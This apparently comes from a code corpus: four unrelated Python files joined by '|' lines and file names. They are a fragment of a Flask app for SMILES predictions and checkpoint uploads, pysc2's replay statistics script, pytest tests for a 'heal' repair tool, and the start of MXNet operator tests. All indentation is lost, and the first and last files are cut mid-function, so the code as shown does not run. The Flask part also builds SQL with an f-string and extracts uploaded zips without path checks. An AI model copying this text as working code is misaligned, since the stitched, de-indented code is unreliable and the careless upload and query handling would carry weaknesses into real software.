data_path = os.path.join(app.config['TEMP_FOLDER'], data_name)
data.save(data_path)
# Check if header is smiles
possible_smiles = get_header(data_path)[0]
smiles = [possible_smiles] if Chem.MolFromSmiles(possible_smiles) is not None else []
# Get remaining smiles
smiles.extend(get_smiles(data_path))
smiles = [[s] for s in smiles]
models = db.get_models(ckpt_id)
model_paths = [os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt') for model in models]
task_names = load_task_names(model_paths[0])
num_tasks = len(task_names)
gpu = request.form.get('gpu')
train_args = load_args(model_paths[0])
# Build arguments
arguments = [
'--test_path', 'None',
'--preds_path', os.path.join(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME']),
'--checkpoint_paths', *model_paths
]
if gpu is not None:
if gpu == 'None':
arguments.append('--no_cuda')
else:
arguments += ['--gpu', gpu]
# Handle additional features
if train_args.features_path is not None:
# TODO: make it possible to specify the features generator if trained using features_path
arguments += [
'--features_generator', 'rdkit_2d_normalized',
'--no_features_scaling'
]
elif train_args.features_generator is not None:
arguments += ['--features_generator', *train_args.features_generator]
if not train_args.features_scaling:
arguments.append('--no_features_scaling')
# Parse arguments
args = PredictArgs().parse_args(arguments)
# Run predictions
preds = make_predictions(args=args, smiles=smiles)
if all(p is None for p in preds):
return render_predict(errors=['All SMILES are invalid'])
# Replace invalid smiles with message
invalid_smiles_warning = 'Invalid SMILES String'
preds = [pred if pred is not None else [invalid_smiles_warning] * num_tasks for pred in preds]
return render_predict(predicted=True,
smiles=smiles,
num_smiles=min(10, len(smiles)),
show_more=max(0, len(smiles)-10),
task_names=task_names,
num_tasks=len(task_names),
preds=preds,
warnings=["List contains invalid SMILES strings"] if None in preds else None,
errors=["No SMILES strings given"] if len(preds) == 0 else None)
@app.route('/download_predictions')
def download_predictions():
"""Downloads predictions as a .csv file."""
return send_from_directory(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'], as_attachment=True, cache_timeout=-1)
@app.route('/data')
@check_not_demo
def data():
"""Renders the data page."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('data.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users())
@app.route('/data/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_data(return_page: str):
"""
Uploads a data .csv file.
:param return_page: The name of the page to render to after uploading the dataset.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
dataset = request.files['dataset']
with NamedTemporaryFile() as temp_file:
dataset.save(temp_file.name)
dataset_errors = validate_data(temp_file.name)
if len(dataset_errors) > 0:
errors.extend(dataset_errors)
else:
dataset_name = request.form['datasetName']
# dataset_class = load_args(ckpt).dataset_type # TODO: SWITCH TO ACTUALLY FINDING THE CLASS
dataset_id, new_dataset_name = db.insert_dataset(dataset_name, current_user, 'UNKNOWN')
dataset_path = os.path.join(app.config['DATA_FOLDER'], f'{dataset_id}.csv')
if dataset_name != new_dataset_name:
warnings.append(name_already_exists_message('Data', dataset_name, new_dataset_name))
shutil.copy(temp_file.name, dataset_path)
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, data_upload_warnings=warnings, data_upload_errors=errors))
@app.route('/data/download/<int:dataset>')
@check_not_demo
def download_data(dataset: int):
"""
Downloads a dataset as a .csv file.
:param dataset: The id of the dataset to download.
"""
return send_from_directory(app.config['DATA_FOLDER'], f'{dataset}.csv', as_attachment=True, cache_timeout=-1)
@app.route('/data/delete/<int:dataset>')
@check_not_demo
def delete_data(dataset: int):
"""
Deletes a dataset.
:param dataset: The id of the dataset to delete.
"""
db.delete_dataset(dataset)
os.remove(os.path.join(app.config['DATA_FOLDER'], f'{dataset}.csv'))
return redirect(url_for('data'))
@app.route('/checkpoints')
@check_not_demo
def checkpoints():
"""Renders the checkpoints page."""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('checkpoints.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users())
@app.route('/checkpoints/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_checkpoint(return_page: str):
"""
Uploads a checkpoint .pt file.
:param return_page: The name of the page to render after uploading the checkpoint file.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt = request.files['checkpoint']
ckpt_name = request.form['checkpointName']
ckpt_ext = os.path.splitext(ckpt.filename)[1]
# Collect paths to all uploaded checkpoints (and unzip if necessary)
temp_dir = TemporaryDirectory()
ckpt_paths = []
if ckpt_ext.endswith('.pt'):
ckpt_path = os.path.join(temp_dir.name, MODEL_FILE_NAME)
ckpt.save(ckpt_path)
ckpt_paths = [ckpt_path]
elif ckpt_ext.endswith('.zip'):
ckpt_dir = os.path.join(temp_dir.name, 'models')
zip_path = os.path.join(temp_dir.name, 'models.zip')
ckpt.save(zip_path)
with zipfile.ZipFile(zip_path, mode='r') as z:
z.extractall(ckpt_dir)
for root, _, fnames in os.walk(ckpt_dir):
ckpt_paths += [os.path.join(root, fname) for fname in fnames if fname.endswith('.pt')]
else:
errors.append(f'Uploaded checkpoint(s) file must be either .pt or .zip but got {ckpt_ext}')
# Insert checkpoints into database
if len(ckpt_paths) > 0:
ckpt_args = load_args(ckpt_paths[0])
ckpt_id, new_ckpt_name = db.insert_ckpt(ckpt_name,
current_user,
ckpt_args.dataset_type,
ckpt_args.epochs,
len(ckpt_paths),
ckpt_args.train_data_size)
for ckpt_path in ckpt_paths:
model_id = db.insert_model(ckpt_id)
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
if ckpt_name != new_ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', ckpt_name, new_ckpt_name))
shutil.copy(ckpt_path, model_path)
temp_dir.cleanup()
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, checkpoint_upload_warnings=warnings, checkpoint_upload_errors=errors))
@app.route('/checkpoints/download/<int:checkpoint>')
@check_not_demo
def download_checkpoint(checkpoint: int):
"""
Downloads a zip of model .pt files.
:param checkpoint: The name of the checkpoint to download.
"""
ckpt = db.query_db(f'SELECT * FROM ckpt WHERE id = {checkpoint}', one=True)
models = db.get_models(checkpoint)
model_data = io.BytesIO()
with zipfile.ZipFile(model_data, mode='w') as z:
for model in models:
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt')
z.write(model_path, os.path.basename(model_path))
model_data.seek(0)
return send_file(
model_data,
mimetype='application/zip',
as_attachment=True,
attachment_filename=f'{ckpt["ckpt_name"]}.zip',
cache_timeout=-1
)
@app.route('/checkpoints/delete/<int:checkpoint>')
@check_not_demo
def delete_checkpoint(checkpoint: int):
"""
Deletes a checkpoint file.
:param checkpoint: The id of the checkpoint to delete.
"""
db.delete_ckpt(checkpoint)
return redirect(url_for('checkpoints'))
|
replay_actions.py
|
#!/usr/bin/python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dump out stats about all the actions that are in use in a set of replays."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import multiprocessing
import os
import signal
import sys
import threading
import time
from absl import app
from absl import flags
from future.builtins import range # pylint: disable=redefined-builtin
import queue
import six
from pysc2 import run_configs
from pysc2.lib import features
from pysc2.lib import point
from pysc2.lib import protocol
from pysc2.lib import remote_controller
from pysc2.lib import replay
from pysc2.lib import static_data
from pysc2.lib import gfile
from s2clientprotocol import common_pb2 as sc_common
from s2clientprotocol import sc2api_pb2 as sc_pb
FLAGS = flags.FLAGS
flags.DEFINE_integer("parallel", 1, "How many instances to run in parallel.")
flags.DEFINE_integer("step_mul", 8, "How many game steps per observation.")
flags.DEFINE_string("replays", None, "Path to a directory of replays.")
flags.mark_flag_as_required("replays")
FLAGS(sys.argv)
size = point.Point(16, 16)
interface = sc_pb.InterfaceOptions(
raw=True, score=False,
feature_layer=sc_pb.SpatialCameraSetup(width=24))
size.assign_to(interface.feature_layer.resolution)
size.assign_to(interface.feature_layer.minimap_resolution)
def sorted_dict_str(d):
return "{%s}" % ", ".join("%s: %s" % (k, d[k])
for k in sorted(d, key=d.get, reverse=True))
class ReplayStats(object):
"""Summary stats of the replays seen so far."""
def __init__(self):
self.replays = 0
self.steps = 0
self.camera_move = 0
self.select_pt = 0
self.select_rect = 0
self.control_group = 0
self.maps = collections.defaultdict(int)
self.races = collections.defaultdict(int)
self.unit_ids = collections.defaultdict(int)
self.valid_abilities = collections.defaultdict(int)
self.made_abilities = collections.defaultdict(int)
self.valid_actions = collections.defaultdict(int)
self.made_actions = collections.defaultdict(int)
self.buffs = collections.defaultdict(int)
self.upgrades = collections.defaultdict(int)
self.effects = collections.defaultdict(int)
self.crashing_replays = set()
self.invalid_replays = set()
def merge(self, other):
"""Merge another ReplayStats into this one."""
def merge_dict(a, b):
for k, v in six.iteritems(b):
a[k] += v
self.replays += other.replays
self.steps += other.steps
self.camera_move += other.camera_move
self.select_pt += other.select_pt
self.select_rect += other.select_rect
self.control_group += other.control_group
merge_dict(self.maps, other.maps)
merge_dict(self.races, other.races)
merge_dict(self.unit_ids, other.unit_ids)
merge_dict(self.valid_abilities, other.valid_abilities)
merge_dict(self.made_abilities, other.made_abilities)
merge_dict(self.valid_actions, other.valid_actions)
merge_dict(self.made_actions, other.made_actions)
merge_dict(self.buffs, other.buffs)
merge_dict(self.upgrades, other.upgrades)
merge_dict(self.effects, other.effects)
self.crashing_replays |= other.crashing_replays
self.invalid_replays |= other.invalid_replays
def __str__(self):
len_sorted_dict = lambda s: (len(s), sorted_dict_str(s))
len_sorted_list = lambda s: (len(s), sorted(s))
new_abilities = ((set(self.valid_abilities.keys())
| set(self.made_abilities.keys()))
- set(static_data.ABILITIES))
new_units = set(self.unit_ids) - set(static_data.UNIT_TYPES)
new_buffs = set(self.buffs) - set(static_data.BUFFS)
new_upgrades = set(self.upgrades) - set(static_data.UPGRADES)
return "\n\n".join((
"Replays: %s, Steps total: %s" % (self.replays, self.steps),
"Camera move: %s, Select pt: %s, Select rect: %s, Control group: %s" % (
self.camera_move, self.select_pt, self.select_rect,
self.control_group),
"Maps: %s\n%s" % len_sorted_dict(self.maps),
"Races: %s\n%s" % len_sorted_dict(self.races),
"Unit ids: %s\n%s" % len_sorted_dict(self.unit_ids),
"New units: %s \n%s" % len_sorted_list(new_units),
"Valid abilities: %s\n%s" % len_sorted_dict(self.valid_abilities),
"Made abilities: %s\n%s" % len_sorted_dict(self.made_abilities),
"New abilities: %s\n%s" % len_sorted_list(new_abilities),
"Valid actions: %s\n%s" % len_sorted_dict(self.valid_actions),
"Made actions: %s\n%s" % len_sorted_dict(self.made_actions),
"Buffs: %s\n%s" % len_sorted_dict(self.buffs),
"New buffs: %s\n%s" % len_sorted_list(new_buffs),
"Upgrades: %s\n%s" % len_sorted_dict(self.upgrades),
"New upgrades: %s\n%s" % len_sorted_list(new_upgrades),
"Effects: %s\n%s" % len_sorted_dict(self.effects),
"Crashing replays: %s\n%s" % len_sorted_list(self.crashing_replays),
"Invalid replays: %s\n%s" % len_sorted_list(self.invalid_replays),
))
class ProcessStats(object):
"""Stats for a worker process."""
def __init__(self, proc_id):
self.proc_id = proc_id
self.time = time.time()
self.stage = ""
self.replay = ""
self.replay_stats = ReplayStats()
def update(self, stage):
self.time = time.time()
self.stage = stage
def __str__(self):
return ("[%2d] replay: %10s, replays: %5d, steps: %7d, game loops: %7s, "
"last: %12s, %3d s ago" % (
self.proc_id, self.replay, self.replay_stats.replays,
self.replay_stats.steps,
self.replay_stats.steps * FLAGS.step_mul, self.stage,
time.time() - self.time))
def valid_replay(info, ping):
"""Make sure the replay isn't corrupt, and is worth looking at."""
if (info.HasField("error") or
info.base_build != ping.base_build or # different game version
info.game_duration_loops < 1000 or
len(info.player_info) != 2):
# Probably corrupt, or just not interesting.
return False
for p in info.player_info:
if p.player_apm < 10:
# Low APM = player just standing around.
# Low MMR = corrupt replay or player who is weak.
return False
return True
class ReplayProcessor(multiprocessing.Process):
"""A Process that pulls replays and processes them."""
def __init__(self, proc_id, run_config, replay_queue, stats_queue):
super(ReplayProcessor, self).__init__()
self.stats = ProcessStats(proc_id)
self.run_config = run_config
self.replay_queue = replay_queue
self.stats_queue = stats_queue
def run(self):
signal.signal(signal.SIGTERM, lambda a, b: sys.exit()) # Exit quietly.
self._update_stage("spawn")
replay_name = "none"
while True:
self._print("Starting up a new SC2 instance.")
self._update_stage("launch")
try:
with self.run_config.start(
want_rgb=interface.HasField("render")) as controller:
self._print("SC2 Started successfully.")
ping = controller.ping()
for _ in range(300):
try:
replay_path = self.replay_queue.get()
except queue.Empty:
self._update_stage("done")
self._print("Empty queue, returning")
return
try:
replay_name = os.path.basename(replay_path)[:10]
self.stats.replay = replay_name
self._print("Got replay: %s" % replay_path)
self._update_stage("open replay file")
replay_data = self.run_config.replay_data(replay_path)
self._update_stage("replay_info")
info = controller.replay_info(replay_data)
self._print((" Replay Info %s " % replay_name).center(60, "-"))
self._print(info)
self._print("-" * 60)
if valid_replay(info, ping):
self.stats.replay_stats.maps[info.map_name] += 1
for player_info in info.player_info:
race_name = sc_common.Race.Name(
player_info.player_info.race_actual)
self.stats.replay_stats.races[race_name] += 1
map_data = None
if info.local_map_path:
self._update_stage("open map file")
map_data = self.run_config.map_data(info.local_map_path)
for player_id in [1, 2]:
self._print("Starting %s from player %s's perspective" % (
replay_name, player_id))
self.process_replay(controller, replay_data, map_data,
player_id)
else:
self._print("Replay is invalid.")
self.stats.replay_stats.invalid_replays.add(replay_name)
finally:
self.replay_queue.task_done()
self._update_stage("shutdown")
except (protocol.ConnectionError, protocol.ProtocolError, remote_controller.RequestError) as e:
print(e)
self.stats.replay_stats.crashing_replays.add(replay_name)
except KeyboardInterrupt:
return
def _print(self, s):
for line in str(s).strip().splitlines():
print("[%s] %s" % (self.stats.proc_id, line))
def _update_stage(self, stage):
self.stats.update(stage)
self.stats_queue.put(self.stats)
def process_replay(self, controller, replay_data, map_data, player_id):
"""Process a single replay, updating the stats."""
self._update_stage("start_replay")
controller.start_replay(sc_pb.RequestStartReplay(
replay_data=replay_data,
map_data=map_data,
options=interface,
observed_player_id=player_id))
feat = features.features_from_game_info(controller.game_info())
self.stats.replay_stats.replays += 1
self._update_stage("step")
controller.step()
while True:
self.stats.replay_stats.steps += 1
self._update_stage("observe")
obs = controller.observe()
for action in obs.actions:
act_fl = action.action_feature_layer
if act_fl.HasField("unit_command"):
self.stats.replay_stats.made_abilities[
act_fl.unit_command.ability_id] += 1
if act_fl.HasField("camera_move"):
self.stats.replay_stats.camera_move += 1
if act_fl.HasField("unit_selection_point"):
self.stats.replay_stats.select_pt += 1
if act_fl.HasField("unit_selection_rect"):
self.stats.replay_stats.select_rect += 1
if action.action_ui.HasField("control_group"):
self.stats.replay_stats.control_group += 1
try:
func = feat.reverse_action(action).function
except ValueError:
func = -1
self.stats.replay_stats.made_actions[func] += 1
for valid in obs.observation.abilities:
self.stats.replay_stats.valid_abilities[valid.ability_id] += 1
for u in obs.observation.raw_data.units:
self.stats.replay_stats.unit_ids[u.unit_type] += 1
for b in u.buff_ids:
self.stats.replay_stats.buffs[b] += 1
for u in obs.observation.raw_data.player.upgrade_ids:
self.stats.replay_stats.upgrades[u] += 1
for e in obs.observation.raw_data.effects:
self.stats.replay_stats.effects[e.effect_id] += 1
for ability_id in feat.available_actions(obs.observation):
self.stats.replay_stats.valid_actions[ability_id] += 1
if obs.player_result:
break
self._update_stage("step")
controller.step(FLAGS.step_mul)
def stats_printer(stats_queue):
"""A thread that consumes stats_queue and prints them every 10 seconds."""
proc_stats = [ProcessStats(i) for i in range(FLAGS.parallel)]
print_time = start_time = time.time()
width = 107
running = True
while running:
print_time += 10
while time.time() < print_time:
try:
s = stats_queue.get(True, print_time - time.time())
if s is None: # Signal to print and exit NOW!
running = False
break
proc_stats[s.proc_id] = s
except queue.Empty:
pass
replay_stats = ReplayStats()
for s in proc_stats:
replay_stats.merge(s.replay_stats)
print((" Summary %0d secs " % (print_time - start_time)).center(width, "="))
print(replay_stats)
print(" Process stats ".center(width, "-"))
print("\n".join(str(s) for s in proc_stats))
print("=" * width)
def replay_queue_filler(replay_queue, replay_list):
"""A thread that fills the replay_queue with replay filenames."""
for replay_path in replay_list:
replay_queue.put(replay_path)
def main(unused_argv):
"""Dump stats about all the actions that are in use in a set of replays."""
run_config = run_configs.get()
if not gfile.Exists(FLAGS.replays):
sys.exit("{} doesn't exist.".format(FLAGS.replays))
stats_queue = multiprocessing.Queue()
stats_thread = threading.Thread(target=stats_printer, args=(stats_queue,))
try:
# For some reason buffering everything into a JoinableQueue makes the
# program not exit, so save it into a list then slowly fill it into the
# queue in a separate thread. Grab the list synchronously so we know there
# is work in the queue before the SC2 processes actually run, otherwise
# The replay_queue.join below succeeds without doing any work, and exits.
print("Getting replay list:", FLAGS.replays)
replay_list = sorted(run_config.replay_paths(FLAGS.replays))
print(len(replay_list), "replays found.")
if not replay_list:
return
if not FLAGS["sc2_version"].present: # ie not set explicitly.
version = replay.get_replay_version(
run_config.replay_data(replay_list[0]))
run_config = run_configs.get(version=version)
print("Assuming version:", version.game_version)
print()
stats_thread.start()
replay_queue = multiprocessing.JoinableQueue(FLAGS.parallel * 10)
replay_queue_thread = threading.Thread(target=replay_queue_filler,
args=(replay_queue, replay_list))
replay_queue_thread.daemon = True
replay_queue_thread.start()
for i in range(min(len(replay_list), FLAGS.parallel)):
p = ReplayProcessor(i, run_config, replay_queue, stats_queue)
p.daemon = True
p.start()
time.sleep(1) # Stagger startups, otherwise they seem to conflict somehow
replay_queue.join() # Wait for the queue to empty.
except KeyboardInterrupt:
print("Caught KeyboardInterrupt, exiting.")
finally:
stats_queue.put(None) # Tell the stats_thread to print and exit.
if stats_thread.is_alive():
stats_thread.join()
if __name__ == "__main__":
app.run(main)
|
test_heal.py
|
import datetime
import json
import threading
import time
import heal
def test_configuration_directory_not_exists(tmp_path, capsys):
configuration_directory = tmp_path.joinpath("not-exists")
status_file = tmp_path.joinpath("status-file")
heal.heal(configuration_directory, status_file, threading.Event())
assert capsys.readouterr().out == f"exiting: {configuration_directory} must exist and be a directory\n"
assert not status_file.exists()
def test_configuration_directory_not_a_directory(tmp_path, capsys):
configuration_directory = tmp_path.joinpath("file")
configuration_directory.touch()
status_file = tmp_path.joinpath("status-file")
heal.heal(configuration_directory, status_file, threading.Event())
assert capsys.readouterr().out == f"exiting: {configuration_directory} must exist and be a directory\n"
assert not status_file.exists()
PROGRESSIVE_AND_KO_INPUT = """
---
- check: false
fix: true
rank: 1
""".lstrip()
PROGRESSIVE_AND_KO_OUTPUT_1 = """
watching: {0}
configuration directory has changed
reading configuration
filtering modes and checks
""".lstrip()
PROGRESSIVE_AND_KO_OUTPUT_2 = """
configuration directory has changed
reading configuration
filtering modes and checks
checks have changed
filtering active checks
active: {"check": "false", "fix": "true", "rank": 1}
[1] failed: false
[1] fixing: true
[1] failed again: false
exiting: fatal error
""".lstrip()
def test_progressive_and_ko(tmp_path, capsys):
# empty configuration
configuration_directory = tmp_path.joinpath("config")
configuration_directory.mkdir()
status_file = tmp_path.joinpath("status-file")
thread = threading.Thread(target=heal.heal, args=(configuration_directory, status_file, threading.Event(), 0.1))
thread.start()
time.sleep(0.15) # 2 cycles
assert json.loads(status_file.read_text()).get("status") == "ok"
assert capsys.readouterr().out == PROGRESSIVE_AND_KO_OUTPUT_1.format(configuration_directory)
# adding failing configuration
configuration_directory.joinpath("failing-configuration").write_text(PROGRESSIVE_AND_KO_INPUT)
thread.join()
assert json.loads(status_file.read_text()).get("status") == "ko"
assert capsys.readouterr().out == PROGRESSIVE_AND_KO_OUTPUT_2
# previous run failed, so if we start it again, it should immediately fail
heal.heal(configuration_directory, status_file, threading.Event())
assert capsys.readouterr().out == f"exiting: ko status found in {status_file}\n"
OK_INPUT = """
---
- check: "[ ! -f {0} ]"
fix: rm {0}
rank: 1
""".lstrip()
OK_OUTPUT = """
watching: {0}
configuration directory has changed
reading configuration
filtering modes and checks
checks have changed
filtering active checks
active: {{"check": "[ ! -f {1} ]", "fix": "rm {1}", "rank": 1}}
[1] failed: [ ! -f {1} ]
[1] fixing: rm {1}
[1] fix successful
[1] failed: [ ! -f {1} ]
[1] fixing: rm {1}
[1] fix successful
exiting: loop-ending signal
""".lstrip()
def test_ok(tmp_path, capsys):
# regular configuration
flag = tmp_path.joinpath("flag")
configuration_directory = tmp_path.joinpath("config")
configuration_directory.mkdir()
configuration_directory.joinpath("config-file").write_text(OK_INPUT.format(flag))
status_file = tmp_path.joinpath("status-file")
event = threading.Event()
thread = threading.Thread(target=heal.heal, args=(configuration_directory, status_file, event, 0.01))
thread.start()
# lots of cycles
time.sleep(0.2)
status_1 = json.loads(status_file.read_text())
assert status_1.get("status") == "ok"
# first problem
flag.touch()
time.sleep(0.1)
status_2 = json.loads(status_file.read_text())
assert status_2.get("status") == "ok"
assert datetime.datetime.fromisoformat(status_2.get("timestamp")) > datetime.datetime.fromisoformat(status_1.get("timestamp"))
# second problem
flag.touch()
time.sleep(0.2)
status_3 = json.loads(status_file.read_text())
assert status_3.get("status") == "ok"
assert datetime.datetime.fromisoformat(status_3.get("timestamp")) > datetime.datetime.fromisoformat(status_2.get("timestamp"))
# normal interruption
event.set()
thread.join()
assert capsys.readouterr().out == OK_OUTPUT.format(configuration_directory, flag)
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_device(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_device().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_device(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_device(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for _ in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_device(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
